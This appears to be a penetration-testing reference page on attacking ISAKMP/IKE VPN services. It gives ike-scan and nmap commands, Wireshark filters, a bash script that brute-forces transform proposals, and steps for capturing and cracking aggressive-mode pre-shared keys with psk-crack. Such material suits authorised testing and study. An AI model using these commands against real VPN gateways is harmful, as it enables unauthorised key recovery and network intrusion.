Notes
| Alternative Ports |
|---|
| 4500 (NAT-T) |
Service Description
ISAKMP (Internet Security Association and Key Management Protocol), commonly seen with IKE (Internet Key Exchange) as part of IPSec VPNs. It negotiates security associations (SAs) and handles authentication/exchange of cryptographic keys.
This is typically the first point of interaction in VPN setups, and is a target for identifying VPN gateways, user identities, and misconfigurations.
Remember
To abuse Aggressive Mode you need to find both a valid ID and transform set to elicit the PSK.
Tools & Exploits
Enumeration
nmap
# With nmap scripts
nmap -sU -p500 --script ike-version <target-ip>ike-scan
Performs IKE discovery and fingerprinting of VPN devices. Can also bruteforce valid ID payloads (aggressive mode).
# Fingerprinting
ike-scan <target-ip>
# Aggressive Mode
ike-scan --aggressive --id=myid --pskcrack <target-ip>strongSwan
Open-source IPsec implementation. Useful for testing VPN connections or setting up rogue VPN servers.
# How To Install
apt install strongswan -yISAKMP Sniffing
wireshark Find ISAKMP packets to determine transform:
udp.port == 500 && isakmp
# Or
ip.addr == <target-ip> && udp.port == 500
- Or if you’re on the same subnet as the VPN:
tcpdump -ni eth0 udp port 500
What to look for:
- Initiator Packet:
- Expand:
ISAKMP > Security Association > Proposals > Proposal > Transforms - Review each transform type: Encryption, Hash, Auth Method, DH Group
- Expand:
- Responder Packet:
- If it contains
Notify Message Type: NO_PROPOSAL_CHOSEN, proposal was rejected - If it contains an SA and subsequent ID/HASH payloads, proposal was accepted
- If it contains
Exchange Type: Look for exchange type = 4 (Aggressive Mode)
- You can also look for the Exchange Mode ID Data, for example:
ISAKMP > Payload: Identification> ID Type: FQDN > ID Data: vpn.company.com
ike-scan vs Wireshark Transform ID Mapping
| Crypto Component | Wireshark ID | ike-scan ID |
|---|---|---|
| 3DES-CBC | 5 | 3 |
| AES-CBC | 7 | 5 |
| SHA1 | 2 | 2 |
| MD5 | 1 | 1 |
| PSK | 1 | 1 |
| MODP 768 | 1 | 1 |
| MODP 1024 | 2 | 2 |
| MODP 1536 | 5 | 5 |
- Manually test for accepted transform proposal:
ike-scan --aggressive --id=your_id --trans=3,1,1,2 <target-ip> # MD5
ike-scan --aggressive --id=your_id --trans=5,2,1,2 <target-ip> # AES
ike-scan --aggressive --id=your_id --trans=3,2,1,1 <target-ip> # MODP768
ike-scan --aggressive --id=your_id --trans=3,2,1,5 <target-ip> # MODP1536- Script to brute-force transform proposals after ID is confirmed valid:
#!/bin/bash
TARGET="$1"
ID="$2"
if [[ -z "$TARGET" || -z "$ID" ]]; then
echo "Usage: $0 <target-ip> <valid-id>"
exit 1
fi
transforms=(
"1,2,1,1"
"1,2,1,2"
"1,1,1,2"
"3,2,1,2"
"5,2,1,1"
"5,2,1,2"
"5,1,1,2"
"5,2,1,5"
)
for trans in "${transforms[@]}"; do
echo -e "\n[*] Trying transform: $trans"
ike-scan --aggressive --id="$ID" --trans="$trans" "$TARGET"
doneNOTE
You can also try enumerating SNMP (v2 or below) to see if you can obtain relevant data.
PSK Cracking
psk-crack
Tool that recovers the pre-shared key from captured IKE handshakes (typically when aggressive mode is enabled and ID is known or guessed).
# After capturing handshake with ike-scan:
psk-crack psk-hash-file.txt- Aggressive mode exposes hashed PSKs, allowing offline cracking.
- Useful to combine
ike-scanwithpsk-crackto recover weak shared secrets.